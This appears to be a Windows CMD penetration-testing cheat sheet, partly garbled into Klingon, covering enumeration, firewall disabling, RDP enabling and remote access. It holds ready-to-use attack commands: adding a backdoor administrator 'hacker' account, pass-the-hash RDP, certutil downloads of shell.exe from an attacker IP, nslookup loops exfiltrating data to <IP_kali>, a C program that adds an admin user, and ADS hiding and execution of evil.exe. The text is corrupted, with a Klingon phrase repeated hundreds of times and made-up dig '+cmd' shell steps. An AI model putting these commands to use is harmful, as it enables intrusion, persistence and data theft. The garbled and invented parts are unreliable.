net localgroup "Power users" UserLoginName /add

mInDu'

qetlh, 'ej, 'ej, Hosts 'ej DNSCache

Interfaces

To view the network interfaces on a Windows system, you can use the ipconfig command. This will display information such as the IP address, subnet mask, and default gateway for each interface.

ipconfig

Routes

To view the routing table on a Windows system, you can use the route print command. This will display information about the network routes, including the destination network, subnet mask, gateway, and interface.

route print

Ports

To view the open ports on a Windows system, you can use the netstat command. This will display a list of active connections and listening ports, along with the associated process ID (PID) and state.

netstat -ano

Hosts

To view the hosts file on a Windows system, you can use the type command. This will display the contents of the file, which maps hostnames to IP addresses.

type C:\Windows\System32\drivers\etc\hosts

DNSCache

To view the DNS cache on a Windows system, you can use the ipconfig /displaydns command. This will display a list of the recently resolved DNS entries, including the hostname, IP address, and time-to-live (TTL) value.

ipconfig /displaydns

ipconfig /all #Info about interfaces
route print #Print available routes
arp -a #Know hosts
netstat -ano #Opened ports?
type C:\WINDOWS\System32\drivers\etc\hosts
ipconfig /displaydns | findstr "Record" | findstr "Name Host"

Qapla'wI'

Firewalls are an essential component of network security. They act as a barrier between a trusted internal network and an untrusted external network, filtering incoming and outgoing network traffic based on predefined rules. Firewalls can be implemented in both hardware and software forms.

Types of Firewalls

1. Packet Filtering Firewalls: These firewalls examine each packet of data that passes through them and compare it against a set of rules. If a packet matches a rule, it is either allowed or denied based on the rule's criteria. This type of firewall operates at the network layer (Layer 3) of the OSI model.

2. Stateful Firewalls: Stateful firewalls not only examine individual packets but also keep track of the state of network connections. They maintain a record of the packets that have already passed through the firewall and use this information to make more informed decisions about subsequent packets. Stateful firewalls operate at the network layer (Layer 3) and transport layer (Layer 4) of the OSI model.

3. Application Firewalls: These firewalls operate at the application layer (Layer 7) of the OSI model and are specifically designed to protect specific applications or services. They can inspect the content of packets and make decisions based on the application-level protocols being used.

Firewall Configuration

To effectively configure a firewall, you need to consider the following:

• Default Deny Policy: By default, a firewall should deny all incoming and outgoing traffic unless explicitly allowed by rules.

• Rule Prioritization: Firewall rules are evaluated in a sequential manner. It is important to prioritize rules based on their importance and potential impact.

• Rule Logging: Enabling logging for firewall rules can help in monitoring and troubleshooting network traffic.

• Regular Updates: Keep the firewall software and firmware up to date to ensure protection against the latest threats.

• Testing and Monitoring: Regularly test and monitor the firewall to ensure that it is functioning as intended and providing the desired level of security.

Firewall Evasion Techniques

Firewalls can be bypassed using various techniques, including:

• Tunneling: Encapsulating network traffic within another protocol to bypass firewall restrictions.

• Fragmentation: Splitting packets into smaller fragments to evade packet filtering firewalls.

• Protocol-level Attacks: Exploiting vulnerabilities in network protocols to bypass firewall rules.

• Covert Channels: Establishing hidden communication channels that bypass firewall inspection.

• Application-level Attacks: Exploiting vulnerabilities in applications to bypass application firewalls.

Understanding firewalls and their potential weaknesses is crucial for both defenders and attackers in the field of cybersecurity.

netsh firewall show state # FW info, open ports
netsh advfirewall firewall show rule name=all
netsh firewall show config # FW info
Netsh Advfirewall show allprofiles

NetSh Advfirewall set allprofiles state off  #Turn Off
NetSh Advfirewall set allprofiles state on  #Trun On
netsh firewall set opmode disable #Turn Off

#How to open ports
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"

#Enable Remote Desktop
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #I found that this line is not needed
::sc config TermService start= auto #I found that this line is not needed
::net start Termservice #I found that this line is not needed

#Enable Remote Desktop with wmic
wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"
##or
wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"

#Enable Remote assistance:
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable

#Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable

::Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49

Shares

Introduction

Shares are a common feature in Windows systems that allow users to access files and folders over a network. As a pentester, it is important to understand how shares work and how they can be exploited during an attack.

Types of Shares

There are two main types of shares in Windows:

1. Administrative Shares: These shares are created automatically by the operating system and are hidden from normal users. They have names that end with a dollar sign ($), such as C$ or ADMIN$. Administrative shares provide access to the root of each drive and are typically used for administrative tasks.

2. Shared Folders: These shares are created by users or administrators and are visible to all users on the network. Shared folders can be used to share files and folders between users or groups.

Enumerating Shares

To gather information about the shares on a Windows system, you can use the net share command. This command will display a list of all the shares on the system, including their names and paths.

net share

Exploiting Shares

Once you have identified a share that you want to exploit, there are several techniques you can use:

1. Brute-Force: If the share requires authentication, you can attempt to brute-force the credentials to gain access. This involves trying different username and password combinations until you find one that works.

2. Null Session: Some shares may allow anonymous access, also known as a null session. This means that no username or password is required to access the share. You can use tools like nullinux or smbmap to enumerate and access null sessions.

3. Misconfigured Permissions: In some cases, shares may have misconfigured permissions that allow unauthorized access. You can use tools like accesschk or icacls to check the permissions of a share and determine if there are any vulnerabilities.

Conclusion

Shares are a common feature in Windows systems that can be exploited during a pentest. By understanding how shares work and the different techniques for exploiting them, you can identify potential vulnerabilities and strengthen the security of your systems.

net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares

Wifi

Introduction

Wifi, short for wireless fidelity, is a technology that allows devices to connect to a network wirelessly. It is commonly used for internet access in homes, offices, and public places. In this section, we will discuss some basic concepts and techniques related to wifi.

SSID

SSID stands for Service Set Identifier. It is the name of a wifi network. When you search for available wifi networks on your device, you will see a list of SSIDs. Each wifi network has a unique SSID, which is used to identify and differentiate it from other networks.

Encryption

Encryption is the process of converting data into a form that cannot be easily understood by unauthorized individuals. Wifi networks can be encrypted to protect the data transmitted over the network from being intercepted and accessed by unauthorized users. There are different encryption protocols available for wifi networks, such as WEP, WPA, and WPA2.

Password Cracking

Password cracking is the process of recovering passwords from stored or transmitted data. In the context of wifi networks, password cracking refers to the act of attempting to guess or crack the password of a wifi network in order to gain unauthorized access. This can be done using various techniques, such as brute-forcing, dictionary attacks, and rainbow table attacks.

Wifi Sniffing

Wifi sniffing is the act of capturing and analyzing network traffic on a wifi network. By sniffing wifi traffic, an attacker can intercept and view the data being transmitted over the network, including sensitive information such as usernames, passwords, and credit card numbers. This can be done using tools like Wireshark or tcpdump.

Wifi Jamming

Wifi jamming is the act of disrupting or disabling a wifi network by transmitting radio signals on the same frequency as the wifi network. This can be done using specialized hardware or software tools. Wifi jamming can be used for various purposes, such as preventing users from connecting to a network or causing denial of service (DoS) attacks.

Conclusion

Understanding the basic concepts and techniques related to wifi is essential for both hackers and network administrators. By knowing how wifi networks work and the vulnerabilities associated with them, you can better protect your own network and identify potential security risks.

netsh wlan show profile #AP SSID
netsh wlan show profile <SSID> key=clear #Get Cleartext Pass

SNMP

SNMP (Simple Network Management Protocol) is a widely used protocol for managing and monitoring network devices. It allows network administrators to collect information about the devices on their network, such as their status, performance, and configuration.

SNMP operates using a client-server model, where the SNMP manager (client) sends requests to the SNMP agent (server) running on the network device. The agent then responds with the requested information.

SNMP uses a hierarchical structure called the Management Information Base (MIB) to organize and represent the data it collects. The MIB contains a collection of objects, each with a unique identifier called an Object Identifier (OID). These objects represent various aspects of the network device, such as its interfaces, system information, and network statistics.

As a pentester, understanding SNMP can be useful for gathering information about a target network. By querying SNMP agents, you can discover valuable details about the network infrastructure, such as the devices connected, their configurations, and potentially even sensitive information if the SNMP agent is misconfigured.

There are several tools available for interacting with SNMP, such as snmpwalk, snmpget, and snmpset. These tools allow you to retrieve information from SNMP agents, manipulate their configurations, and even perform actions on the network devices.

When conducting a pentest, it's important to check if SNMP is enabled on the target network and if any default or weak community strings are being used. Community strings are like passwords that grant access to the SNMP agent. If weak or default community strings are found, an attacker could potentially gain unauthorized access to the network devices.

To protect against SNMP-based attacks, network administrators should follow best practices such as disabling SNMP if not needed, using strong community strings, and restricting SNMP access to trusted IP addresses.

Remember, always obtain proper authorization before performing any pentesting activities.

reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s

qo'noS qetlh vItlhutlh

ipconfig /all

ipconfig /all jatlhlaHbe'chugh, DaH jatlhlaHbe'chugh, 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaHbe'chugh. 'ej DaH jatlhlaH

ipconfig /all

ARP jatlh

The Address Resolution Protocol (ARP) is a protocol used to map an IP address to a physical MAC address on a local network. The ARP table, also known as the ARP cache, is a table that stores the mappings between IP addresses and MAC addresses.

To view the ARP table on a Windows system, you can use the arp command in the command prompt. Here's how you can do it:

C:\> arp -a

This command will display the ARP table, showing the IP addresses and corresponding MAC addresses of the devices on the local network.

It's important to note that the ARP table can be manipulated by attackers to perform ARP spoofing attacks, where they impersonate other devices on the network. Therefore, it's crucial to regularly monitor the ARP table and be aware of any suspicious entries.

arp -A

Download

Bitsadmin.exe

bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1

CertReq.exe is a command-line tool used for certificate enrollment and management in Windows operating systems. It allows users to create certificate requests, submit them to a certification authority (CA), and retrieve issued certificates. CertReq.exe supports various operations such as generating key pairs, creating certificate signing requests (CSRs), and installing certificates. It is commonly used by system administrators and security professionals for managing digital certificates in Windows environments.

CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt

Certutil.exe

Certutil.exe is a command-line utility in Windows that is used to manage certificates. It provides various functions for working with certificates, such as installing, exporting, and verifying them.

Usage

To use Certutil.exe, open a command prompt and type certutil followed by the desired command and its parameters.

Examples

• Viewing certificate details:

certutil -dump <certificate_file>

• Exporting a certificate:

certutil -exportPFX -p <password> -f <certificate_file> <output_file>

• Installing a certificate:

certutil -addstore <store_name> <certificate_file>

• Verifying a certificate:

certutil -verify <certificate_file>

Conclusion

Certutil.exe is a powerful tool for managing certificates in Windows. It provides a wide range of functions that can be useful for various certificate-related tasks.

certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe

Qapla'! QaStaHvIS Download lo'laHvIS https://lolbas-project.github.io Daq yIlo'!

QaDmoHwI'

cd #Get current dir
cd C:\path\to\dir #Change dir
dir #List current dir
dir /a:h C:\path\to\dir #List hidden files
dir /s /b #Recursive list without shit
time #Get current time
date #Get current date
shutdown /r /t 0 #Shutdown now
type <file> #Cat file

#Runas
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted

#Hide
attrib +h file #Set Hidden
attrib -h file #Quit Hidden

#Give full control over a file that you owns
icacls <FILE_PATH> /t /e /p <USERNAME>:F
icacls <FILE_PATH> /e /r <USERNAME> #Remove the permision

#Recursive copy to smb
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win

#exe2bat to transform exe file in bat file

#ADS
dir /r #Detect ADS
more file.txt:ads.txt #read ADS
powershell (Get-Content file.txt -Stream ads.txt)

# Get error messages from code
net helpmsg 32 #32 is the code in that case

Bypass Char Blacklisting

tlhIngan Hol Translation:

Bypass Char Blacklisting

tlhIngan Hol Translation:

Bypass Char Blacklisting

tlhIngan Hol Translation:

Bypass Char Blacklisting

tlhIngan Hol Translation:

echo %HOMEPATH:~6,-11%   #\
who^ami   #whoami

DOSfuscation

Generates an obfuscated CMD line

DOSfuscation

QapHa'moHwI'

Generates an obfuscated CMD line

git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
help
SET COMMAND type C:\Users\Administrator\Desktop\flag.txt
encoding

Listen address ACLs

You can listen on http://+:80/Temporary_Listen_Addresses/ without being administrator.

Listen address ACLs

You can listen on http://+:80/Temporary_Listen_Addresses/ without being administrator.

netsh http show urlacl

Manual DNS shell

Attacker (Kali) must use one of these 2 options:

Option 1: Using nslookup

The nslookup command can be used to manually perform DNS queries and interact with the DNS server. To start a DNS shell, the attacker can follow these steps:

1. Open a terminal in Kali.
2. Run the nslookup command followed by the target domain or IP address.
3. Use the set type=txt command to set the query type to TXT records.
4. Use the server <DNS_IP> command to specify the DNS server to use.
5. Use the ls -d <shell_command> command to execute shell commands. Replace <shell_command> with the desired command.
6. The output of the shell command will be displayed in the terminal.

Option 2: Using dig

The dig command is another option to manually interact with the DNS server and perform DNS queries. To establish a DNS shell, the attacker can follow these steps:

1. Open a terminal in Kali.
2. Run the dig command followed by the target domain or IP address.
3. Use the +short option to display only the answer section of the DNS response.
4. Use the +tcp option to force the use of TCP instead of UDP.
5. Use the +ignore option to ignore the DNS server's response and send the query directly to the target IP address.
6. Use the +cmd option to execute shell commands. Append the desired command after the +cmd option.
7. The output of the shell command will be displayed in the terminal.

sudo responder -I <iface> #Active
sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passive

Qa'Hom

for /f tokens technique: Qa'HomDaq jatlhlaHbe'chugh, pe'vIl X loghDI' loghDI' wejDIch qar'a'logh DNS vItlhutlh.

for /f %a in ('whoami') do nslookup %a <IP_kali> #Get whoami
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali> #Get word2
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali> #List folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #List that folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali> #Same as last one
#More complex commands
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Same as last one

ghItlh redirect output, 'ej read vItlhutlh.

whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>

CMD jatlh C code laH

To call CMD from C code, you can use the system() function provided by the C standard library. This function allows you to execute a command in the command prompt.

Here is an example of how you can call CMD from C code:

#include <stdlib.h>

int main() {
    system("cmd /c <command>");
    return 0;
}

Replace <command> with the command you want to execute in CMD. The /c flag is used to execute the command and then terminate CMD.

Compile and run the C code, and it will execute the specified command in CMD. Make sure to handle any output or errors that may be generated by the command.

#include <stdlib.h>     /* system, NULL, EXIT_FAILURE */

// When executed by Administrator this program will create a user and then add him to the administrators group
// i686-w64-mingw32-gcc addmin.c -o addmin.exe
// upx -9 addmin.exe

int main (){
int i;
i=system("net users otherAcc 0TherAcc! /add");
i=system("net localgroup administrators otherAcc /add");
return 0;
}

Alternate Data Streams CheatSheet (ADS/Alternate Data Stream)

Examples taken from https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f. There are a lot more in there!

Alternate Data Streams CheatSheet (ADS/Alternate Data Stream)

Examples taken from https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f. There are a lot more in there!

## Selected Examples of ADS Operations ##

### Adding Content to ADS ###
# Append executable to a log file as an ADS
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
# Download a script directly into an ADS
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

### Discovering ADS Content ###
# List files and their ADS
dir /R
# Use Sysinternals tool to list ADS of a file
streams.exe <c:\path\to\file>

### Extracting Content from ADS ###
# Extract an executable stored in an ADS
expand c:\ads\file.txt:test.exe c:\temp\evil.exe

### Executing ADS Content ###
# Execute an executable stored in an ADS using WMIC
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
# Execute a script stored in an ADS using PowerShell
powershell -ep bypass - < c:\temp:ttt

qaStaHvIS AWS hacking vItlhutlh htARTE (HackTricks AWS Red Team Expert)!

• qaStaHvIS cybersecurity company vItlhutlh? HackTricks company advertise want? PEASS latest version download HackTricks PDF want? SUBSCRIPTION PLANS check!
• The PEASS Family Discover, exclusive NFTs collection our.
• official PEASS & HackTricks swag Get.
• Join 💬 Discord group telegram group or follow me Twitter 🐦@carlospolopm.
• Share hacking tricks submitting PRs hacktricks repo and hacktricks-cloud repo.